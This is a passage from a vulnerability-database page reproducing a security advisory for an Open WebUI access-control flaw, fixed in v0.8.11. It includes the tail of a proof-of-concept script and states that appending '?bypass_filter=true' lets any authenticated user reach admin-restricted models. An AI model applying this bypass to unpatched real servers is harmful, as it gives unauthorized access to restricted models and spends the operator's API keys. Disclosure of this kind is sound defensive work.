\u2500\u2500\n    if openai_bypassed or ollama_bypassed:\n        print(f\"\\n[+] SUCCESS: bypass_filter query parameter bypasses model access control!\")\n        print(f\"    OpenAI endpoint (/openai/chat/completions): {\u0027BYPASSED\u0027 if openai_bypassed else \u0027not bypassed\u0027}\")\n        print(f\"    Ollama endpoint (/ollama/api/chat):          {\u0027BYPASSED\u0027 if ollama_bypassed else \u0027not bypassed\u0027}\")\n        print(f\"\")\n        print(f\"    Any authenticated user can append ?bypass_filter=true to skip\")\n        print(f\"    check_model_access() and use admin-restricted models via the\")\n        print(f\"    server\u0027s own API keys.\")\n        sys.exit(0)\n    else:\n        print(f\"\\n[-] FAILED: bypass_filter did not bypass access control on either endpoint\")\n        sys.exit(1)\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n\n### Impact\n\nAny authenticated user (including those with the lowest \"user\" role) can invoke any model configured on the server, regardless of access control settings. This bypasses the admin\u0027s ability to restrict which models are available to which users \u2014 for example, limiting expensive models to specific teams or keeping certain models internal-only.\n\n\n## Resolution\n\nFixed in commit [c0385f60b](https://github.com/open-webui/open-webui/commit/c0385f60ba049da48d2d5452068586d375303c37), first released in **v0.8.11** (Mar 2026) \u2014 one day after this report.\n\n`bypass_filter` is no longer a function parameter on either route handler. Both `routers/openai.py` and `routers/ollama.py` now read it via `getattr(request.state, \u0027bypass_filter\u0027, False)`. Because `request.state` can only be populated by server-side code in the same process (typically `utils/chat.py` when recursing into a base model the caller is already authorized for), external HTTP clients cannot set it via query string, body, or any other transport-level mechanism. Appending `?bypass_filter=true` to the URL has no effect \u2014 the query parameter is now silently ignored by FastAPI since it doesn\u0027t bind to any handler argument.\n\nUsers on `\u003e= 0.8.11` are not affected.",
  "id": "GHSA-v6qf-75pr-p96m",
  "modified": "2026-05-19T16:00:05Z",
  "published": "2026-05-14T20:25:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45365"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/commit/c0385f60ba049da48d2d5452068586d375303c37"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.8.11"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI: Authenticated users can bypass model access control via exposed query parameter [AI-ASSISTED]"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-45365 (GCVE-0-2026-45365)

FKIE_CVE-2026-45365

GHSA-V6QF-75PR-P96M

Summary

Details

PoC

Impact

Resolution

Tags

Sightings

Nomenclature